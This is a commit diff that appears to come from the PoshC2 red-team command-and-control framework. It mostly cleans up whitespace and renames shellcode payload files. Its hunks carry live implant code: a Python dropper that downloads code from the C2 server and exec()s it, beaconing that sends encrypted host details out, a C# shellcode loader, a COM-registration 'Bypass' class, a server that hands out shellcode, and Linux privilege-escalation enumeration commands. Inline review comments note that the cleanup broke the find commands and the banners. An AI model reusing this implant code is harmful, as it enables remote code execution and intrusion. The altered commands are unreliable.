Pull out payloads from Payloads.py; Add base64 encoded binary payload files; Fix whitespace issues that were triggering.

temp
m0rv4i 2019-03-12 20:33:45 +00:00
parent 321469cc40
commit 31bf485ac7
33 changed files with 216 additions and 178 deletions


@ -4,7 +4,7 @@ from DB import update_mods, new_task, select_mods
from Config import ModulesDirectory
import os, base64
def check_module_loaded( module_name, randomuri, user, force=False ):
def check_module_loaded(module_name, randomuri, user, force=False):
try:
modules_loaded = select_mods(randomuri)
if force:


@ -84,7 +84,7 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
s.wfile.write(content)
elif ("%spotal" % QuickCommandURI) in s.path:
filename = "%sSharp-shellcode_x86.bin" % (PayloadsDirectory)
filename = "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
@ -94,7 +94,7 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
s.wfile.write(content)
elif ("%slogin" % QuickCommandURI) in s.path:
filename = "%sSharp-shellcode_x64.bin" % (PayloadsDirectory)
filename = "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
@ -403,7 +403,7 @@ if __name__ == '__main__':
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], HostnameIP, C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],C2[21], get_newimplanturl(), PayloadsDirectory)
new_urldetails( "updated_host", HostnameIP, C2[3], "", "", "", "" )
new_urldetails("updated_host", HostnameIP, C2[3], "", "", "", "")
update_item("HostnameIP", "C2Server", HostnameIP)
update_item("QuickCommand", "C2Server", QuickCommand)
newPayload.CreateRaw()
@ -416,7 +416,7 @@ if __name__ == '__main__':
newPayload.CreateEXE()
newPayload.CreateMsbuild()
newPayload.CreatePython()
newPayload.WriteQuickstart( ROOTDIR + 'quickstart.txt' )
newPayload.WriteQuickstart(ROOTDIR + 'quickstart.txt')
else:
print ("Initializing new project folder and database" + Colours.GREEN)
@ -451,7 +451,7 @@ if __name__ == '__main__':
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
new_urldetails( "default", C2[1], C2[3], "", "", "", "" )
new_urldetails("default", C2[1], C2[3], "", "", "", "")
newPayload.CreateRaw()
newPayload.CreateDlls()
newPayload.CreateShellcode()
@ -464,7 +464,7 @@ if __name__ == '__main__':
create_self_signed_cert(ROOTDIR)
newPayload.CreatePython()
newPayload.WriteQuickstart( directory + '/quickstart.txt' )
newPayload.WriteQuickstart(directory + '/quickstart.txt')
print ("")
print ("CONNECT URL: "+select_item("HostnameIP", "C2Server")+get_newimplanturl() + Colours.GREEN)

20
Core.py

@ -38,24 +38,24 @@ def get_images():
return images
# Decrypt a string from base64 encoding
def get_encryption( key, iv='0123456789ABCDEF' ):
def get_encryption(key, iv='0123456789ABCDEF'):
from Crypto.Cipher import AES
iv = os.urandom(AES.block_size)
aes = AES.new( base64.b64decode(key), AES.MODE_CBC, iv )
aes = AES.new(base64.b64decode(key), AES.MODE_CBC, iv)
return aes
# Decrypt a string from base64 encoding
def decrypt( key, data ):
def decrypt(key, data):
iv = data[0:16]
aes = get_encryption(key, iv)
data = aes.decrypt( base64.b64decode(data) )
data = aes.decrypt(base64.b64decode(data))
return data[16:]
# Decrypt a string from base64 encoding
def decrypt_bytes_gzip( key, data):
def decrypt_bytes_gzip(key, data):
iv = data[0:16]
aes = get_encryption(key, iv)
data = aes.decrypt( data )
data = aes.decrypt(data)
import StringIO
import gzip
infile = StringIO.StringIO(data[16:])
@ -64,7 +64,7 @@ def decrypt_bytes_gzip( key, data):
return data
# Encrypt a string and base64 encode it
def encrypt( key, data, gzip=False ):
def encrypt(key, data, gzip=False):
if gzip:
print 'Gzipping data - pre-zipped len, ' + str(len(data))
import StringIO
@ -78,11 +78,11 @@ def encrypt( key, data, gzip=False ):
mod = len(data) % 16
if mod != 0:
newlen = len(data) + (16-mod)
data = data.ljust( newlen, '\0' )
data = data.ljust(newlen, '\0')
aes = get_encryption(key, os.urandom(16))
data = aes.IV + aes.encrypt( data )
data = aes.IV + aes.encrypt(data)
if not gzip:
data = base64.b64encode( data )
data = base64.b64encode(data)
return data
def filecomplete(text, state):

29
DB.py

@ -54,8 +54,7 @@ def initializedb():
ProxyURL TEXT,
ProxyUsername TEXT,
ProxyPassword TEXT,
CredentialExpiry TEXT
);"""
CredentialExpiry TEXT);"""
create_creds = """CREATE TABLE Creds (
credsID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,
@ -150,7 +149,7 @@ def get_newtasks_all():
else:
return None
def new_urldetails( RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry ):
def new_urldetails(RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry):
conn = sqlite3.connect(Database)
conn.text_factory = str
c = conn.cursor()
@ -164,7 +163,7 @@ def drop_newtasks():
c.execute("DELETE FROM NewTasks ")
conn.commit()
def new_task( task, user, randomuri ):
def new_task(task, user, randomuri):
conn = sqlite3.connect(Database)
conn.text_factory = str
c = conn.cursor()
@ -185,7 +184,7 @@ def get_lastcommand():
else:
return None
def new_commandhistory( command ):
def new_commandhistory(command):
conn = sqlite3.connect(Database)
conn.text_factory = str
c = conn.cursor()
@ -229,7 +228,7 @@ def get_implants():
else:
return None
def get_implanttype( randomuri ):
def get_implanttype(randomuri):
conn = sqlite3.connect(Database)
conn.row_factory = sqlite3.Row
c = conn.cursor()
@ -240,7 +239,7 @@ def get_implanttype( randomuri ):
else:
return None
def get_implantdetails( randomuri ):
def get_implantdetails(randomuri):
conn = sqlite3.connect(Database)
conn.row_factory = sqlite3.Row
c = conn.cursor()
@ -251,7 +250,7 @@ def get_implantdetails( randomuri ):
else:
return None
def get_hostdetails( implant_id ):
def get_hostdetails(implant_id):
conn = sqlite3.connect(Database)
conn.row_factory = sqlite3.Row
c = conn.cursor()
@ -262,7 +261,7 @@ def get_hostdetails( implant_id ):
else:
return None
def get_randomuri( implant_id ):
def get_randomuri(implant_id):
conn = sqlite3.connect(Database)
conn.row_factory = sqlite3.Row
c = conn.cursor()
@ -281,37 +280,37 @@ def add_autorun(Task):
c.execute("INSERT INTO AutoRuns (Task) VALUES (?)", (Task,))
conn.commit()
def update_sleep( sleep, randomuri ):
def update_sleep(sleep, randomuri):
conn = sqlite3.connect(Database)
c = conn.cursor()
c.execute("UPDATE Implants SET Sleep=? WHERE RandomURI=?",(sleep, randomuri))
conn.commit()
def update_label( label, randomuri ):
def update_label(label, randomuri):
conn = sqlite3.connect(Database)
c = conn.cursor()
c.execute("UPDATE Implants SET Label=? WHERE RandomURI=?",(label, randomuri))
conn.commit()
def update_mods( modules, randomuri ):
def update_mods(modules, randomuri):
conn = sqlite3.connect(Database)
c = conn.cursor()
c.execute("UPDATE Implants SET ModsLoaded=? WHERE RandomURI=?",(modules, randomuri))
conn.commit()
def kill_implant( randomuri ):
def kill_implant(randomuri):
conn = sqlite3.connect(Database)
c = conn.cursor()
c.execute("UPDATE Implants SET Alive='No' WHERE RandomURI=?",(randomuri,))
conn.commit()
def unhide_implant( randomuri ):
def unhide_implant(randomuri):
conn = sqlite3.connect(Database)
c = conn.cursor()
c.execute("UPDATE Implants SET Alive='Yes' WHERE RandomURI=?",(randomuri,))
conn.commit()
def select_mods( randomuri ):
def select_mods(randomuri):
conn = sqlite3.connect(Database)
conn.row_factory = sqlite3.Row
c = conn.cursor()


@ -78,10 +78,10 @@ def remove_persist():
s.call("crontab -l | { cat; } | grep -v '_psh.sh'| crontab -", shell=True)
return "Removed user persistence via crontab: \\r\\n**must delete files manually**"
def decrypt_bytes_gzip( key, data):
def decrypt_bytes_gzip(key, data):
iv = data[0:16]
aes = get_encryption(key, iv)
data = aes.decrypt( data )
data = aes.decrypt(data)
import StringIO
import gzip
infile = StringIO.StringIO(data[16:])
@ -108,7 +108,7 @@ while(True):
#print html
if html:
try:
returncmd = decrypt( key, html )
returncmd = decrypt(key, html)
returncmd = returncmd.rstrip('\\0')
if "multicmd" in returncmd:
@ -213,7 +213,7 @@ while(True):
opener = urllib2.build_opener()
postcookie = encrypt(key, taskId)
data = base64.b64decode(random.choice(icoimage))
dataimage = data.ljust( 1500, '\x00' )
dataimage = data.ljust(1500, '\x00')
dataimagebytes = dataimage+(encrypt(key, returnval, gzip=True))
if hh: req=urllib2.Request(server,dataimagebytes,headers={'Host':hh,'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie})
else: req=urllib2.Request(server,dataimagebytes,headers={'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie})


@ -73,13 +73,13 @@ public class Program
public class Bypass : ServicedComponent
{
[ComRegisterFunction]
public static void RegisterClass ( string key )
public static void RegisterClass (string key)
{
Program.Main();
}
[ComUnregisterFunction]
public static void UnRegisterClass ( string key )
public static void UnRegisterClass (string key)
{
Program.Main();
}


@ -3,7 +3,7 @@
#REPLACEKEY#
def encrypt( key, data, gzip=False ):
def encrypt(key, data, gzip=False):
if gzip:
import StringIO
import gzip
@ -15,29 +15,29 @@ def encrypt( key, data, gzip=False ):
iv = os.urandom(16)
if mod != 0:
newlen = len(data) + (16-mod)
data = data.ljust( newlen, '\0' )
data = data.ljust(newlen, '\0')
aes = get_encryption(key, iv)
ct = ""
for i in xrange(0, len(data), 16):
ct += aes.encrypt( data[i:i+16] )
ct += aes.encrypt(data[i:i+16])
ct = iv + ct
data = ct
if not gzip:
data = base64.b64encode( data )
data = base64.b64encode(data)
return data
def get_encryption( key, iv ):
def get_encryption(key, iv):
aes = AESModeOfOperationCBC(base64.b64decode(key), iv = iv)
return aes
# Decrypt a string from base64 encoding
def decrypt( key, data ):
def decrypt(key, data):
data = base64.b64decode(data)
aes = get_encryption(key, data[0:16])
cipher = data[16:]
ct = ""
for i in xrange(0, len(cipher), 16):
ct += aes.decrypt( cipher[i:i+16] )
ct += aes.decrypt(cipher[i:i+16])
return ct
PADDING_NONE = 'none'
@ -412,7 +412,7 @@ class AES(object):
result.append((self.S[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.S[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
result.append((self.S[(t[(i + s2) % 4] >> 8) & 0xFF] ^ (tt >> 8)) & 0xFF)
result.append((self.S[ t[(i + s3) % 4] & 0xFF] ^ tt ) & 0xFF)
result.append((self.S[ t[(i + s3) % 4] & 0xFF] ^ tt) & 0xFF)
return result
@ -446,7 +446,7 @@ class AES(object):
result.append((self.Si[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.Si[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
result.append((self.Si[(t[(i + s2) % 4] >> 8) & 0xFF] ^ (tt >> 8)) & 0xFF)
result.append((self.Si[ t[(i + s3) % 4] & 0xFF] ^ tt ) & 0xFF)
result.append((self.Si[ t[(i + s3) % 4] & 0xFF] ^ tt) & 0xFF)
return result


@ -69,7 +69,7 @@ class Program
IntPtr mem = VirtualAlloc(IntPtr.Zero, (IntPtr)(shell.Length*2), AllocationType.COMMIT, Protection.PAGE_READWRITE);
if( mem != IntPtr.Zero )
if(mem != IntPtr.Zero)
{
uint oldProt = 0;
uint threadId = 0;


@ -16,7 +16,7 @@ res=urllib2.urlopen(r);d=res.read();c=d[1:];b=c.decode("hex")
s=hashlib.sha512(b)
if pykey in b and pyhash == s.hexdigest() and cstr < kd: exec(b)
else: sys.exit(0)
un=pwd.getpwuid( os.getuid() )[ 0 ];pid=os.getpid()
un=pwd.getpwuid(os.getuid())[ 0 ];pid=os.getpid()
is64=sys.maxsize > 2**32;arch=('x64' if is64 == True else 'x86')
hn=socket.gethostname();o=urllib2.build_opener()
encsid=encrypt(key, '%s;%s;%s;%s;%s;%s' % (un,hn,hn,arch,pid,serverclean))

20
HTML.py

@ -70,7 +70,7 @@ def get_implants_all_db():
else:
return None
def get_htmlimplant( randomuri ):
def get_htmlimplant(randomuri):
conn = sqlite3.connect(Database)
conn.row_factory = sqlite3.Row
c = conn.cursor()
@ -233,23 +233,23 @@ function tweakMarkup(){
//var classes = ['id', 'Label', taskid', 'randomuri', 'command', 'output', 'user','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot']
tbl = document.getElementById("PoshTable");
ths = tbl.getElementsByTagName("th");
for( i=0; i<ths.length; i++ ){
for(i=0; i<ths.length; i++){
th = ths[i];
th.className = classes[i]
}
trs = tbl.getElementsByTagName("tr");
for( i=0; i<trs.length; i++ ){
for(i=0; i<trs.length; i++){
tr = trs[i]
tds = tr.getElementsByTagName('td');
if( i % 2 == 0 ){
if(i % 2 == 0){
tr.className = 'even';
}else{
tr.className = 'odd';
}
for( j=0; j<tds.length; j++ ){
for(j=0; j<tds.length; j++){
td = tds[j];
td.className = classes[j]
if( td.className.match(/output|Hostname|IpAddress|Key|FirstSeen|LastSeen|PID|Proxy|Arch|Domain|Alive|Sleep|ModsLoaded|Pivot|id|Label|taskid|randomuri|command|output|User|ImplantID|RandomURI|User|Hostname|IpAddress|Key|FirstSeen|LastSeen|PID|Proxy|Arch|Domain|Alive|Sleep|ModsLoaded|Pivot/) ){
if(td.className.match(/output|Hostname|IpAddress|Key|FirstSeen|LastSeen|PID|Proxy|Arch|Domain|Alive|Sleep|ModsLoaded|Pivot|id|Label|taskid|randomuri|command|output|User|ImplantID|RandomURI|User|Hostname|IpAddress|Key|FirstSeen|LastSeen|PID|Proxy|Arch|Domain|Alive|Sleep|ModsLoaded|Pivot/)){
td.className += ' hidden';
td.innerHTML = '<div>' + td.innerHTML + '</div>';
td.onclick = toggleHide
@ -259,13 +259,13 @@ function tweakMarkup(){
}
function toggleHide( evnt ){
function toggleHide(evnt){
td = evnt.target;
if( td.nodeName == 'DIV' ){
if(td.nodeName == 'DIV'){
td = td.parentElement;
}
cls = td.className;
if( cls.match(/hidden/) ){
if(cls.match(/hidden/)){
cls = cls.replace('hidden','shown');
}else{
cls = cls.replace('shown','hidden');
@ -368,7 +368,7 @@ font-size: 12px;
__________ .__. _________ ________
\_______ \____ _____| |__ \_ ___ \ \_____ \\
| ___/ _ \/ ___/ | \ / \ \/ / ____/
| | ( <_> )___ \| Y \ \ \____/ \\
| | ( <_>)___ \| Y \ \ \____/ \\
|____| \____/____ >___| / \______ /\_______ \\
\/ \/ \/ \/
================== www.PoshC2.co.uk ===============
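Review bot: The whitespace cleanup has edited the contents of the banner string literal in the last hunk of this file: `( <_> )` became `( <_>)`, which shortens that row by one character and misaligns the ASCII art. The same edit shows up in the other banner hunks on this page (the `logopic` raw string, the shell `echo` banners, and the second HTML report template). Restore `( <_> )` in each of them and restrict the whitespace rule to code tokens so that string literals are left alone.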


@ -4,7 +4,7 @@ logopic = r"""
__________ .__. _________ ________
\_______ \____ _____| |__ \_ ___ \ \_____ \\
| ___/ _ \/ ___/ | \ / \ \/ / ____/
| | ( <_> )___ \| Y \ \ \____/ \\
| | ( <_>)___ \| Y \ \ \____/ \\
|____| \____/____ >___| / \______ /\_______ \\
\/ \/ \/ \/
=============== v4.8 www.PoshC2.co.uk =============


@ -74,7 +74,7 @@ def createproxypayload(user, startup):
newPayload.CreateShellcode("Proxy")
newPayload.CreateEXE("Proxy")
newPayload.CreateMsbuild("Proxy")
new_urldetails( "Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass, credsexpire )
new_urldetails("Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass, credsexpire)
startup(user, "Created new proxy payloads")
def createdaisypayload(user, startup):
@ -95,7 +95,7 @@ def createdaisypayload(user, startup):
newPayload.CreateShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateMsbuild(name)
new_urldetails( name, C2[1], C2[3], domain, daisyurl, daisyhostid, "" )
new_urldetails(name, C2[1], C2[3], domain, daisyurl, daisyhostid, "")
startup(user, "Created new %s daisy payloads" % name)
def createnewpayload(user, startup):
@ -127,7 +127,7 @@ def createnewpayload(user, startup):
newPayload.CreateEXE("%s_" % domainbase)
newPayload.CreateMsbuild("%s_" % domainbase)
newPayload.CreatePython("%s_" % domainbase)
new_urldetails( randomid, domain, domainfront, proxyurl, proxyuser, proxypass, credsexpire )
new_urldetails(randomid, domain, domainfront, proxyurl, proxyuser, proxypass, credsexpire)
startup(user, "Created new payloads")
def complete(text, state):
@ -353,11 +353,11 @@ def startup(user, printhelp = ""):
if "creds" in implant_id.lower():
startup(user, "creds module not implemented yet")
if (implant_id.lower() == "pwnself" ) or (implant_id.lower() == "p"):
if (implant_id.lower() == "pwnself") or (implant_id.lower() == "p"):
subprocess.Popen(["python", "%s%s" % (PayloadsDirectory, "py_dropper.py")])
startup(user)
if (implant_id.lower() == "tasks" ) or (implant_id.lower() == "tasks "):
if (implant_id.lower() == "tasks") or (implant_id.lower() == "tasks "):
alltasks = ""
tasks = get_newtasks_all()
if tasks is None:
@ -368,7 +368,7 @@ def startup(user, printhelp = ""):
alltasks += "(%s) %s\r\n" % ("%s\\%s" % (imname[11],imname[2]),task[2])
startup(user, "Queued tasks:\r\n\r\n%s" % alltasks)
if (implant_id.lower() == "cleartasks" ) or (implant_id.lower() == "cleartasks "):
if (implant_id.lower() == "cleartasks") or (implant_id.lower() == "cleartasks "):
drop_newtasks()
startup(user, "Empty tasks queue\r\n")


@ -5,7 +5,7 @@ echo ""
echo """ __________ .__. _________ ________
\_______ \____ _____| |__ \_ ___ \ \_____ \\
| ___/ _ \/ ___/ | \ / \ \/ / ____/
| | ( <_> )___ \| Y \ \ \____/ \\
| | ( <_>)___ \| Y \ \ \____/ \\
|____| \____/____ >___| / \______ /\_______ \\
\/ \/ \/ \/
================= www.PoshC2.co.uk ================"""
@ -63,7 +63,7 @@ echo ""
echo """ __________ .__. _________ ________
\_______ \____ _____| |__ \_ ___ \ \_____ \\
| ___/ _ \/ ___/ | \ / \ \/ / ____/
| | ( <_> )___ \| Y \ \ \____/ \\
| | ( <_>)___ \| Y \ \ \____/ \\
|____| \____/____ >___| / \______ /\_______ \\
\/ \/ \/ \/
================= www.PoshC2.co.uk ================"""


@ -138,10 +138,10 @@ if "root" in userInfo["ID"]["results"][0]:
# File/Directory Privs
print "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n"
fdPerms = {"WWDIRSROOT":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root", "msg":"World Writeable Directories for User/Group 'Root'", "results":results},
"WWDIRS":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root", "msg":"World Writeable Directories for Users other than Root", "results":results},
"WWFILES":{"cmd":"find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null", "msg":"World Writable Files", "results":results},
"SUID":{"cmd":"find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null", "msg":"SUID/SGID Files and Directories", "results":results},
fdPerms = {"WWDIRSROOT":{"cmd":"find / \(-wholename '/home/homedir*' -prune \) -o \(-type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root", "msg":"World Writeable Directories for User/Group 'Root'", "results":results},
"WWDIRS":{"cmd":"find / \(-wholename '/home/homedir*' -prune \) -o \(-type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root", "msg":"World Writeable Directories for Users other than Root", "results":results},
"WWFILES":{"cmd":"find / \(-wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \(-type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null", "msg":"World Writable Files", "results":results},
"SUID":{"cmd":"find / \(-perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null", "msg":"SUID/SGID Files and Directories", "results":results},
"ROOTHOME":{"cmd":"ls -ahlR /root 2>/dev/null", "msg":"Checking if root's home folder is accessible", "results":results}
}
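Review bot: The whitespace cleanup changed the shell commands stored in the `fdPerms` string literals: `\( -wholename`, `\( -type d` and `\( -perm -2000` became `\(-wholename`, `\(-type d` and `\(-perm -2000`. `find` only treats `(` as a grouping operator when it is a separate argument, so the WWDIRSROOT, WWDIRS, WWFILES and SUID commands will most likely fail with an expression error. Because each command ends in `2>/dev/null`, that error is hidden and the report would show empty results instead of a failure. Keep the original spacing, e.g. `find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null`, and exclude string literals from the whitespace rule. The code that runs these commands is outside the hunk, so how an empty result is reported cannot be checked from here.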


@ -65,7 +65,7 @@ def get_implants_all_db():
else:
return None
def get_htmlimplant( randomuri ):
def get_htmlimplant(randomuri):
conn = sqlite3.connect(DB)
conn.row_factory = sqlite3.Row
c = conn.cursor()
@ -207,23 +207,23 @@ function tweakMarkup(){
var classes = ['id', 'Label', taskid', 'randomuri', 'command', 'output', 'user','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot']
tbl = document.getElementById("PoshTable");
ths = tbl.getElementsByTagName("th");
for( i=0; i<ths.length; i++ ){
for(i=0; i<ths.length; i++){
th = ths[i];
th.className = classes[i]
}
trs = tbl.getElementsByTagName("tr");
for( i=0; i<trs.length; i++ ){
for(i=0; i<trs.length; i++){
tr = trs[i]
tds = tr.getElementsByTagName('td');
if( i % 2 == 0 ){
if(i % 2 == 0){
tr.className = 'even';
}else{
tr.className = 'odd';
}
for( j=0; j<tds.length; j++ ){
for(j=0; j<tds.length; j++){
td = tds[j];
td.className = classes[j]
if( td.className.match(/output|Hostname|IpAddress|Key|FirstSeen|LastSeen|PID|Proxy|Arch|Domain|Alive|Sleep|ModsLoaded|Pivot|id|taskid|randomuri|command|output|user|ImplantID|RandomURI|User|Hostname|IpAddress|Key|FirstSeen|LastSeen|PID|Proxy|Arch|Domain|Alive|Sleep|ModsLoaded|Pivot|Label/) ){
if(td.className.match(/output|Hostname|IpAddress|Key|FirstSeen|LastSeen|PID|Proxy|Arch|Domain|Alive|Sleep|ModsLoaded|Pivot|id|taskid|randomuri|command|output|user|ImplantID|RandomURI|User|Hostname|IpAddress|Key|FirstSeen|LastSeen|PID|Proxy|Arch|Domain|Alive|Sleep|ModsLoaded|Pivot|Label/)){
td.className += ' hidden';
td.innerHTML = '<div>' + td.innerHTML + '</div>';
td.onclick = toggleHide
@ -233,13 +233,13 @@ function tweakMarkup(){
}
function toggleHide( evnt ){
function toggleHide(evnt){
td = evnt.target;
if( td.nodeName == 'DIV' ){
if(td.nodeName == 'DIV'){
td = td.parentElement;
}
cls = td.className;
if( cls.match(/hidden/) ){
if(cls.match(/hidden/)){
cls = cls.replace('hidden','shown');
}else{
cls = cls.replace('shown','hidden');
@ -342,7 +342,7 @@ font-size: 12px;
__________ .__. _________ ________
\_______ \____ _____| |__ \_ ___ \ \_____ \
| ___/ _ \/ ___/ | \ / \ \/ / ____/
| | ( <_> )___ \| Y \ \ \____/ \
| | ( <_>)___ \| Y \ \ \____/ \
|____| \____/____ >___| / \______ /\_______
\/ \/ \/ \/
================= www.PoshC2.co.uk ===============


@ -353,7 +353,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
else:
print("Source file could not be read or was empty")
except Exception as e:
print ("Error with source file: %s" % e )
print ("Error with source file: %s" % e)
traceback.print_exc()
elif "kill-implant" in command.lower() or "exit" in command.lower():


@ -77,7 +77,7 @@ def handle_py_command(command, user, randomuri, startup):
else:
print("Source file could not be read or was empty")
except Exception as e:
print ("Error with source file: %s" % e )
print ("Error with source file: %s" % e)
traceback.print_exc()
elif command.lower() == "help" or command == "?" or command.lower() == "help ":


@ -55,7 +55,7 @@ def handle_sharp_command(command, user, randomuri, startup):
else:
print("Source file could not be read or was empty")
except Exception as e:
print ("Error with source file: %s" % e )
print ("Error with source file: %s" % e)
traceback.print_exc()
elif "unhide-implant" in command.lower():


@ -6,7 +6,7 @@ echo ""
echo """__________ .__. _________ ________
\_______ \____ _____| |__ \_ ___ \ \_____ \
| ___/ _ \/ ___/ | \ / \ \/ / ____/
| | ( <_> )___ \| Y \ \ \____/ \
| | ( <_>)___ \| Y \ \ \____/ \
|____| \____/____ >___| / \______ /\_______ \
\/ \/ \/ \/
================= www.PoshC2.co.uk ================="""


@ -52,7 +52,7 @@ def argp(cmd):
pass
return args
def load_file( location ):
def load_file(location):
fr = None
try:
file = open((location), "rb")